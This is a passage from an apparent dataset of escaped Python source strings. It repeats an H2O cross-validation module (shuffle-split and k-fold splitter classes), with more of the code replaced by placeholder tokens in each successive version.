shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n <function token>\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n <function token>\n <function token>\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n 